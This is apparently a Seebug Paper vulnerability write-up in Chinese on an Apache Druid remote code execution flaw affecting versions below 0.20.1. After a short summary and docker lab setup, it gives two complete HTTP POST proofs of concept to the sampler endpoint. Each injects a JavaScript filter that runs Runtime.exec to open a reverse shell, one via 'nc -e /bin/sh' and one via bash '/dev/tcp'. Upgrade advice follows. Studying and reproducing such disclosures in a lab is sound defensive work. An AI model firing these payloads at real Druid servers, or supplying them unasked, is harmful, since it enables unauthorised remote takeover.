作者:Ja0k
本文為作者投稿,Seebug Paper 期待你的分享,凡經采用即有禮品相送!
投稿郵箱:paper@seebug.org
一.漏洞概要
Apache Druid 是用Java編寫的面向列的開源分布式數據存儲,旨在快速獲取大量事件數據,并在數據之上提供低延遲查詢。
Apache Druid 默認情況下缺乏授權認證,攻擊者可以發送特制請求,利用Druid服務器上進程的特權執行任意代碼。
二.影響范圍
影響版本: Apache Druid < 0.20.1
安全版本: Apache Druid 0.20.1
三.環境搭建
https://github.com/apache/druid/
https://druid.apache.org/docs/latest/tutorials/index.html
下載0.19版本
https://github.com/apache/druid/releases/tag/druid-0.19.0
解壓
cd druid-druid-0.19.0-rc1\distribution\docker
docker-compose up -d
打開 http://192.168.123.10:8888
四.漏洞復現
Poc1:通用
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.123.10:8888
Accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Referer: http://192.168.123.10:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 1007
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.123.10 5555 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
注意:因為是docker環境沒有bash,這里直接采用nc -e反彈
Poc2:通用
.png)POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: 0.0.0.0:8888
Content-Length: 1005
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
DNT: 1
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
"function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/0.0.0.0/5555 0>&1')}",
"dimension": "added",
"": {
"enabled": "true"
}
}
}
},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
五.修復建議
升級至安全版本及其以上。
參考
https://www.hedysx.com/2732.html
https://xz.aliyun.com/t/9176
https://www.t00ls.net/thread-59631-1-1.html
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/1476/
暫無評論